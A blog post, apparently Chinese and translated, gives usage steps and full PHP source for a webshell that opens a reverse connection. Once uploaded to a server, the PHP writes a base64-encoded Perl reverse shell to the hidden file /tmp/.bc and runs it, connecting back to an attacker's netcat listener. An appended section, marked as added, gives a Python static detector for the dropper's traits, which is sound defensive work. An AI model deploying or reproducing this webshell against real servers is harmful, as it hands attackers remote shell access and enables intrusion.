金华恒隆管道 posted on 2011-11-11 15:54:06

Reverse Port Connection from a PHP Webshell

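<p>Usage: save the code below as a separate PHP file. After uploading it to the server, listen on a port locally with NC, set the connect-back IP and port in the code, then visit the uploaded PHP file directly, and a shell will be sent back to NC.</p>
<p>Test example: first run nc -vv -l -p port locally, then visit the PHP page http://www.site.com/phpdkft.php, and a reverse shell arrives locally.</p>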
<p><span><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/111111/1558140.png" border="0" small="0" alt="" /></span></p>
<p><span><img class="blogimg" src="https://img.jbzj.com/do/uploads/allimg/111111/1558141.png" border="0" small="0" alt="" /></span></p>
<p>This way, each time you can simply visit this PHP page and get a shell sent straight back, with no other tedious steps. The already modified code is posted below.</p>
<div class="msgheader">The code is as follows:</div>
<div class="msgborder" id="phpcode5"><pre>
&lt;?php
// Resolve a program's full path with `which`; fall back to the bare name.
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

// Run a command through whichever execution function exists and return its output.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

// Write the base64-decoded text to a file.
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}

$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=&gt;'perl','c'=&gt;'c');
// Base64-encoded Perl script that is written to /tmp/.bc below.
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &amp;");
?&gt;
</pre></div>
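<p>An added detection example, not part of the original post: a Python static check for the traits the posted file shows (a fallback chain of command-execution functions, a base64-decoded blob written to disk, a hidden file under /tmp, and an embedded script). The trait names, the threshold of three execution functions and the SAMPLE input are assumptions constructed for illustration.</p>

```python
import base64
import re

EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
# Adjacent PHP string literals joined with "." (how the post splits its blob).
CONCAT = re.compile(r'["\']\s*\.\s*["\']')
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')
HIDDEN_TMP = re.compile(r"""["'](/tmp|/var/tmp|/dev/shm)/\.[\w.-]+["']""")

def decoded_scripts(php):
    """Decode long base64 literals; keep those that decode to a '#!' script."""
    hits = []
    for blob in B64_LITERAL.findall(CONCAT.sub("", php)):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64
            continue
        if raw.startswith(b"#!"):
            hits.append(raw)
    return hits

def findings(php):
    """Return the dropper traits (assumed names) found in one PHP source."""
    out = []
    used = {f for f in EXEC_FUNCS if re.search(rf"(?<![\w>$]){f}\s*\(", php)}
    if len(used) >= 3:  # assumed threshold: several interchangeable exec paths
        out.append("exec-fallback-chain")
    if re.search(r"base64_decode\s*\(", php) and re.search(
            r"\b(fputs|fwrite|file_put_contents)\s*\(", php):
        out.append("base64-decoded-file-write")
    if HIDDEN_TMP.search(php):
        out.append("hidden-temp-file")
    if decoded_scripts(php):
        out.append("embedded-script-blob")
    return out

# Constructed sample: same shape as the posted dropper, harmless payload.
_B64 = base64.b64encode(b'#!/usr/bin/perl\nprint "constructed sample\\n";\n').decode()
SAMPLE = f'''<?php
$b = "{_B64[:40]}".
"{_B64[40:]}";
$fp = @fopen('/tmp/.x', 'w'); @fputs($fp, @base64_decode($b)); @fclose($fp);
if (function_exists('exec')) {{ @exec("perl /tmp/.x"); }}
elseif (function_exists('system')) {{ @system("perl /tmp/.x"); }}
else {{ @passthru("perl /tmp/.x"); }}
'''

if __name__ == "__main__":
    print(findings(SAMPLE))
```

<p>Each trait alone also appears in legitimate code, so treat a single hit as a lead and the combination as the signal worth triaging.</p>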